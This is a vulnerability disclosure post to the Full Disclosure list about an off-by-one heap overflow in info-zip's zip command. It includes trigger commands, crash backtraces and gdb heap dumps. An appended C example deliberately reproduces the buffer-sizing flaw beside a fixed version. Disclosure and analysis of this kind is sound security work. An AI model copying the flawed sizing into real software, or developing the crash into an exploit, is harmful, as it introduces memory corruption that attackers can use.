Date: Thu, 5 Jul 2018 23:23:57 +0900
From: 오세훈 <sehun.oh@...erone.kr>
To: fulldisclosure@...lists.org
Subject: [FD] info-zip, zip command crash.

Hello,

I found a crash in info-zip's zip command.
This vulnerability is caused by an off-by-one.
I don't use a malformed file for the crash, just the command.

And if the 'zip' binary is added to a function, it can be an exploitable vulnerability, I think.

[ Environment ]

OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11

[ Condition ]

* Using options -T, -TT
* Vulnerability is caused by an off-by-one.
: Linux command execution using options -T, -TT
: To execute the command given with the -T and -TT options, it is stored in the heap before system(), and the data to be stored is parsed as follows.
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: When the command is stored in the heap, the off-by-one occurs.
: It happens in the code below.
	Disassembly -
		.text:000000000040A052                 mov     rax, [rsp+48h+var_40]
		.text:000000000040A057                 mov     word ptr [r15+rax+2], 27h
	Hex-Rays -
		*(_WORD *)&v7[v16 + 2] = 0x27;


[ Error Msg ]

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA'	<- process dies
sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]

zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  <- process does not die

sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]

zip error: Interrupted (aborting)


[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'

* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: this case mallocs 0x18 bytes.
: so, the next chunk's size is overwritten with null (off by one).
# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340:	0x0000000000000230	0x0000000000000020
0x67f350:	0x4141414141414141	0x616c662720414141
0x67f360:	0x002770697a2e5467	0x00000000000000c1 <- off by one
0x67f370:	0x00000000000a031e	0x000000004ce40567
0x67f380:	0x0000000040a61838	0x0000000000000003
0x67f390:	0x0000000000000003	0x0000001800000004
0x67f3a0:	0x0000000000000000	0x0000000000000001
0x67f3b0:	0x0000000000000000	0x0000000081b40000
0x67f3c0:	0x000000000067f490	0x0000000000000000
0x67f3d0:	0x000000000067f450	0x0000000000000000
0x67f3e0:	0x000000000067f430	0x000000000067f470
0x67f3f0:	0x000000000067f4d0	0x0000000000000000
0x67f400:	0x0000000000000000	0x0000000000000000
0x67f410:	0x0000000000000000	0x0000000000000000
0x67f420:	0x0000000000000000	0x0000000000000021
0x67f430:	0x00007f0067616c66	0x00007ffff7bc1b78

# Crash
0x67f340:	0x0000000000000230	0x0000000000000020
0x67f350:	0x4141414141414141	0x6c66272041414141
0x67f360:	0x2770697a2e546761	0x0000000000000000 <- off by one
0x67f370:	0x00000000000a031e	0x000000004ce40567
0x67f380:	0x0000000040a61838	0x0000000000000003
0x67f390:	0x0000000000000003	0x0000001800000004
0x67f3a0:	0x0000000000000000	0x0000000000000001
0x67f3b0:	0x0000000000000000	0x0000000081b40000
0x67f3c0:	0x000000000067f490	0x0000000000000000
0x67f3d0:	0x000000000067f450	0x0000000000000000
0x67f3e0:	0x000000000067f430	0x000000000067f470
0x67f3f0:	0x000000000067f4d0	0x0000000000000000
0x67f400:	0x0000000000000000	0x0000000000000000
0x67f410:	0x0000000000000000	0x0000000000000000
0x67f420:	0x0000000000000000	0x0000000000000021
0x67f430:	0x00007f0067616c66	0x00007ffff7bc1b78

* Case 2 : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
# Crash
: before __fprintf_chk@plt <0x402330>
0x67f150:	0x0000000000000000	0x0000000000000041
0x67f160:	0x000000000067f0b0	0x4141414141414141
0x67f170:	0x4141414141414141	0x4141414141414141
0x67f180:	0x4141414141414141	0x6c66272041414141
0x67f190:	0x2770697a2e546761 	0x0000000000000100 <- off by one
					        ^
				       prev_size

# not crash
: before __fprintf_chk@plt <0x402330>
0x67f150:	0x0000000000000000	0x0000000000000041
0x67f160:	0x000000000067f0b0	0x4141414141414141
0x67f170:	0x4141414141414141	0x4141414141414141
0x67f180:	0x4141414141414141	0x616c662720414141
0x67f190:	0x002770697a2e5467	0x00000000000001f1

: after __fprintf_chk@plt <0x402330>
0x67f150:	0x0000000000000000	0x0000000000000251
0x67f160:	0x00007ffff7bc1db8	0x00007ffff7bc1db8
0x67f170:	0x4141414141414141	0x4141414141414141
0x67f180:	0x4141414141414141	0x616c662720414141
0x67f190:	0x002770697a2e5467	0x0000000000000211

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
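As an added illustration (not info-zip's source and not the reporter's code), the C below reconstructs the bug class the post describes: a heap buffer for `<cmd> '<archive>'` sized for the space and the two quotes but not the terminating NUL, so the final `'\0` word store lands one byte past the allocation. The arithmetic matches the post's own figures (`AAAAAAAAAAAA 'flagT.zip'` is 24 characters and the reported allocation is 0x18). The function names and the +3 sizing are assumptions made for illustration; the corrected version beside it sizes for the NUL and bounds the write with snprintf.

```c
/* Hypothetical reconstruction of the bug class in the post; NOT info-zip's code.
 * A command string "<cmd> '<archive>'" is assembled into a heap buffer whose
 * requested size forgets the terminating NUL byte. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bytes actually needed: cmd, space, quote, archive, quote, NUL. */
size_t cmd_buf_needed(const char *cmd, const char *archive)
{
    return strlen(cmd) + strlen(archive) + 4;
}

/* Assumed faulty sizing: counts the space and both quotes (+3), not the NUL. */
size_t cmd_buf_undersized(const char *cmd, const char *archive)
{
    return strlen(cmd) + strlen(archive) + 3;
}

/* Emulates the faulty build into a buffer of the undersized length, with one
 * extra canary byte so the demonstration itself stays in bounds.  In the real
 * program that byte is the neighbouring heap chunk's metadata.  Returns 1 if
 * the canary was overwritten with NUL, 0 if not, -1 on allocation failure. */
int vuln_build_clobbers_next_byte(const char *cmd, const char *archive)
{
    size_t n = cmd_buf_undersized(cmd, archive);
    unsigned char *buf = malloc(n + 1);
    if (!buf) return -1;
    buf[n] = 0xAA;                           /* canary just past the allocation */
    size_t off = strlen(cmd);
    memcpy(buf, cmd, off);
    buf[off++] = ' ';
    buf[off++] = '\'';
    memcpy(buf + off, archive, strlen(archive));
    off += strlen(archive);
    buf[off] = '\'';                         /* index n-1: last valid byte */
    buf[off + 1] = '\0';                     /* index n: one byte too far */
    int clobbered = (buf[n] == 0);
    free(buf);
    return clobbered;
}

/* Corrected version: the size includes the NUL and snprintf bounds the write.
 * Caller frees the result; NULL on failure or truncation. */
char *safe_build_cmd(const char *cmd, const char *archive)
{
    size_t n = cmd_buf_needed(cmd, archive);
    char *buf = malloc(n);
    if (!buf) return NULL;
    int w = snprintf(buf, n, "%s '%s'", cmd, archive);
    if (w < 0 || (size_t)w >= n) { free(buf); return NULL; }
    return buf;
}
```

The same 76-A input from the post gives 88 (0x58) needed characters plus the NUL, so every size listed in the post is exactly one byte short.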
